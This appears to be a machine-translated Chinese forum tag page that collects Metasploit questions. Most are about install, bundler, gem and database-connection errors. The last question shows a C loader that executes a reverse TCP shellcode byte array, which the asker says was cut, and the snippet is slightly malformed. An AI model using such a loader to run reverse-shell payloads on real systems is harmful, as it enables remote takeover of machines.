标签: metasploit

通过darkoperator/MSF-Installer对Metaploit进行istallation尝试启动msfconsole并返回:

/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- /usr/local/bin/config/boot (LoadError)
    from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /usr/local/bin/msfconsole:23:in `<main>'

使用:

Linux ubuntu 3.13.0-32-generic 

有人有个主意吗？

自安装Metasploit以来，我遇到了严重问题，因此我想将其卸载

我确实尝试过/ opt / metasploit-framework / uninstall，但是它不起作用

你能帮助我吗。

所以我在我的PC硬盘上安装了parrot OS，之后我更新了漏洞系统并尝试运行MSFCONSOLE。执行该命令后，我收到此错误：

Bundler failed to load and return this error:

cannot load such file -- bundler/setup

you may need to uninstall or upgrade bundler

在此之后我卸载了 bundler 并再次安装它没有用。

我也尝试升级它，但它说所有软件包都是最新的。

我gem install bundler 也成功地运行了它，安装了 bundler 和 1 gem 但之后它在我运行后弹出相同的消息msfconsole

这是解决这个问题的正确方法吗..？

所以我在虚拟机中运行backtrack 5.我正在尝试更新metasploit.我从github下载了metasploit目录并删除了旧的svn目录,就像网络告诉我的那样(https://community.rapid7.com/community/metasploit/blog/2013/05/20/git-clone-metasploit-dont -svn-checkout).运行msfupdate时出现此错误:

root@bt:~/metasploit# ./msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via git
[*] Note: Updating from bleeding edge
HEAD is now at a02e0ee Land #2682 - Kimai v0.9.2 'db_restore.php' SQL Injection
Already on 'master'
Already up-to-date.
[*] Updating gems...
./msfupdate:188:in `require': no such file to load -- bundler (LoadError)
    from ./msfupdate:188:in `update_git!'
    from ./msfupdate:137:in `block in run!'
    from ./msfupdate:135:in `chdir'
    from ./msfupdate:135:in `run!'
    from ./msfupdate:292:in `<main>'

我知道我可以运行bundle命令来"捆绑更新"和"捆绑安装".在旁注中,当您运行"捆绑更新"时,这也会导致错误:

Gem::InstallError: factory_girl requires …

我对Msfvenom格式类型有疑问。

msfvenom --help-formats

Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war

Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

什么是js_be和js_le格式？

提前致谢

我最近升级了 metasploit 框架，完成后，当我尝试启动它时，出现下一个错误：

msfconsole
Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted?
Run bundle install to install missing gems.

我已经卸载它并重新安装，但问题仍然存在。有什么建议吗？

我想在OS X 10.9上安装metasploit.我运行捆绑安装的所有东西,在installing pg (0.16.0)它错误输出

/System/Library/Frameworks/Ruby.framework/Versions/2.0/usr/lib/ruby/2.0.0/universal-darwin13/rbconfig.rb:212: warning: Insecure world writable dir /usr/local in PATH, mode 040777
Fetching gem metadata from https://rubygems.org/.........
Fetching gem metadata from https://rubygems.org/..
Using rake (10.1.0) 
Using i18n (0.6.5) 
Using multi_json (1.0.4) 
Using activesupport (3.2.14) 
Using builder (3.0.4) 
Using activemodel (3.2.14) 
Using arel (3.0.2) 
Using tzinfo (0.3.37) 
Using activerecord (3.2.14) 
Using database_cleaner (1.1.1) 
Using diff-lcs (1.2.4) 
Using factory_girl (4.2.0) 
Using fivemat (1.2.1) 
Using json (1.8.0) 
Installing pg (0.16.0) 
Gem::Installer::ExtensionBuildError: ERROR: Failed to build gem native …

我在/ opt/metasploit中的ubuntu 14.04(LTS)中安装了metasploit v4.我也安装了postgresql.我对metasploit和postgresql非常新鲜.我启动metasploit,但我无法连接到数据库,所以我更改了这个文件/opt/metasploit/apps/pro/ui/config/database.yml,我只是将密码更改为"testtest",文件内容为:

development:
     adapter: "postgresql"
     database: "msf3"
     username: "msf3"
     password: "testtest"
     port: 7337
     host: "localhost"
     pool: 256
     timeout: 5

  production:
    adapter: "postgresql"
    database: "msf3"
    username: "msf3"
    password: "testtest"
    port: 7337
    host: "localhost"
    pool: 256
    timeout: 5

所以我这样做:

service postgresql restart
service metasploit restart

那些成功执行.我运行"msfconsole",然后得到"msf>",我运行这个:

msf> db_connect msf3:testtest@127.0.0.1/msf3
msf> db_stats
[*] postgresql selected, no connection

我不知道会发生什么,所以我再次运行msfconsole,我得到了这个:

[-] Failed to connect to the database: FATAL:  password authentication failed for user "msf3"

我可以使用postgres创建新用户和数据库,然后使用db_connect进行连接.但每次,我都必须再次运行db_connect.所以我认为metasploit默认使用msf3作为用户和数据库.我想连接到msf3.我该怎么办？

正如我在问题标题中所说，如何在 Kali 上读取或访问 Metasploit 中的漏洞利用源代码？

注意：请不要说“你在 ~/.msf4 下查看过吗”。因为除了空文件夹什么也没有。

当我尝试用 C 执行 shellcode（一个基本的反向 TCP，指向本地地址）时遇到问题。

我从基础开始，编写了以下代码：

#define WIN32_LEAN_AND_MEAN
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>



int main(int argc, char * argv[])
{

    unsigned char shellcode[] = \
        "\xfd\xab\xd2\xa9\xb1\x29\xe0\xdd\x38\x64\x51\x24\x9d\x0f\xdf"
        "\x8a\xc2\x01\x0d\x2e\x6c\x9b\x86\xa9\x2e\x6f\xd9\xb3\x04\x4a"
        "\x35\x1c\x0a\xc6\xe7\x18\xf4\xaf\x3e\xed\x4b\x5c\x1a\x08\x8b"
        "\x71\x27\x5e\x20\xd1\x4d\xaf\x8f\x2d\x23\xe1\x68\x25\xf3\x19"
        "\xd2\x7b\x5e\xca\x26\x2a\xc7\xa0\x98\x64\x72\x7b\x03\x05\xf0"
        "\x46\x03\xdf\x19\x86\xfb\x04\xd0\x7d\xd9\xf8\xa0\xfb\x8c\xa0"
        "\x2d\xb2\xcb\x7f\xde\x7c\xc4\xd4\xe6\x94\xde\x56\x81\x53\xfc"
        "\x59\xe3\xfc\xb6\x7d\x50\x7e\xde\x6d\xf0\x8a\x33\x35\x99\xfc"
        "\x66\x0c\x45\xf0\xdc\xcb\x49\x4d\xa1\x2f\xd7\xaf\x59\xdc\xcf"
        "\x90\x8b\xd3\x7c\xb7\x7e\x6f\xa8\x15\xe4\x1d\xfd\xc2\xe7\x9d"
        "\x15\x88\x8b\xfb\x3b\x30\x1d\x41\xe6\x22\xdf\x3f\x4f\xb8\xe3"
        "\x65\x0d\xa8\xc1\x0a\x2d\xe9\x77\x7d\x84\x83\xa7\xfc\x29\x80"
        "\x72\xcd\xcc\x68\xa1\x08\x35\xda\xba\x01\xe2\xe5\x01\xe9\x05"
        ;


    int(*ret)() = (int(*)())shellcode;
    ret();

}


return 1;
}

（我剪切了示例的 shellcode）当我使用 Visual Studio Community 2017 编译这个 .c 文件时，我收到一些关于未使用的 argv 和 argc 的警告，以及 ret 中从 () 到 (void) 的转换。

然后我尝试执行该文件，并得到一个很棒的“已停止工作”。所以我在 Visual Studio 中启动调试，这是我得到的：

所以这是一个访问冲突错误，但是为什么呢？我在谷歌上搜索了一下，似乎这个错误可能有很多原因，但我不明白为什么它会发生在我身上。